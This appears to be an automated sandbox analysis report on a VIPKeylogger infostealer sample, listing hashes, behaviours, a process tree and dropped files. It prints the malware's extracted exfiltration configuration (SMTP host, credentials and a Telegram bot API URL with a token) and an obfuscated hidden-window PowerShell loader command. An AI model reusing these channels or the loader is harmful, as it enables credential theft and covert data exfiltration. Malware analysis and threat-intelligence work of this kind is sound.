Analysis
-
max time kernel
93s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-01-2025 04:12
Static task
static1
Behavioral task
behavioral1
Sample
8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
-
Size
761KB
-
MD5
a1204c6a7fe28bab5db0e3240513a857
-
SHA1
909f041efc5859b43f547017085e3cf39a05a4fa
-
SHA256
8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff
-
SHA512
7d7c39189e6bc7c5339e08154dbbc45230b07ff55b62dadfe9828851276c0111ab76c143931d7a097395204cd2df2f00d2647f5e6f0e3254999988635c409777
-
SSDEEP
12288:0GCX77iIcM1saeQHgPVseMP/pmRR324xFcdW693tRLPHj6XOaho:qr75cgYQHgK3PxEBXi93tJPDUOB
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.abraher.com - Port:
587 - Username:
[email protected] - Password:
General1 - Email To:
[email protected]
https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage?chat_id=7171338311
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1500 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 3964 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 35 1628 msiexec.exe 37 1628 msiexec.exe 39 1628 msiexec.exe 41 1628 msiexec.exe 43 1628 msiexec.exe 49 1628 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 34 drive.google.com 35 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1628 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1500 powershell.exe 1628 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\devotee\Organosol.ini 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\typhloalbuminuria\rekylgevrs.ini 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe File opened for modification C:\Windows\Fonts\ketoside.ref 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3920 1628 WerFault.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1628 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1500 powershell.exe Token: SeIncreaseQuotaPrivilege 1500 powershell.exe Token: SeSecurityPrivilege 1500 powershell.exe Token: SeTakeOwnershipPrivilege 1500 powershell.exe Token: SeLoadDriverPrivilege 1500 powershell.exe Token: SeSystemProfilePrivilege 1500 powershell.exe Token: SeSystemtimePrivilege 1500 powershell.exe Token: SeProfSingleProcessPrivilege 1500 powershell.exe Token: SeIncBasePriorityPrivilege 1500 powershell.exe Token: SeCreatePagefilePrivilege 1500 powershell.exe Token: SeBackupPrivilege 1500 powershell.exe Token: SeRestorePrivilege 1500 powershell.exe Token: SeShutdownPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeSystemEnvironmentPrivilege 1500 powershell.exe Token: SeRemoteShutdownPrivilege 1500 powershell.exe Token: SeUndockPrivilege 1500 powershell.exe Token: SeManageVolumePrivilege 1500 powershell.exe Token: 33 1500 powershell.exe Token: 34 1500 powershell.exe Token: 35 1500 powershell.exe Token: 36 1500 powershell.exe Token: SeDebugPrivilege 1628 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3964 wrote to memory of 1500 3964 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe 83 PID 3964 wrote to memory of 1500 3964 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe 83 PID 3964 wrote to memory of 1500 3964 8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe 83 PID 1500 wrote to memory of 1628 1500 powershell.exe 97 PID 1500 wrote to memory of 1628 1500 powershell.exe 97 PID 1500 wrote to memory of 1628 1500 powershell.exe 97 PID 1500 wrote to memory of 1628 1500 powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe"C:\Users\Admin\AppData\Local\Temp\8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\Admin\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 23964⤵
- Program crash
PID:3920
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1628 -ip 16281⤵PID:1056
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD501e76fe9d2033606a48d4816bd9c2d9d
SHA1e46d8a9ed4d5da220c81baf5f1fdb94708e9aba2
SHA256ee052fd5141bf769b841846170aabf0d7c2bb922c74c623c3f109344534f7a70
SHA51262ef7095d1bf53354c20329c2ce8546c277aa0e791839c8a24108a01f9483a953979259e0ad04dbcab966444ee7cdd340f8c9557bc8f98e9400794f2751dc7e0
-
Filesize
71KB
MD5ed7e63cf5634b14fe01d4de956824d88
SHA11f765a37046506fc4125be6841c907ad14d6d241
SHA2561ad13d6915fd2f28864ec1d26a89e3c3918bbeae7575cec876fe12a184c66d47
SHA512ffcc939991c5c8030342f7975635d9c54d08a2d45fae760663e5888dc5c5552ac05082f87905d0e4167b13512bc2fb8ba5e5291cf87c8941e29e5c7b3a75e861
-
Filesize
316KB
MD5f6a7f77b3a470e3befbe2f11db0c4acc
SHA10d7503d0065ae76fcae637b750f2ee51370e136c
SHA256562bc5352f4411d89743b1492098f7eab76e312645fd4458a1c55dba106dbf7c
SHA512e29fa29ed411e4236f7f2ede87886e84e0a1bea7e9ff5dbae6cf795cd85a823058b4e2ec19097244190ca3383e93c5d49519d392fb8533f2c1908c11a2730177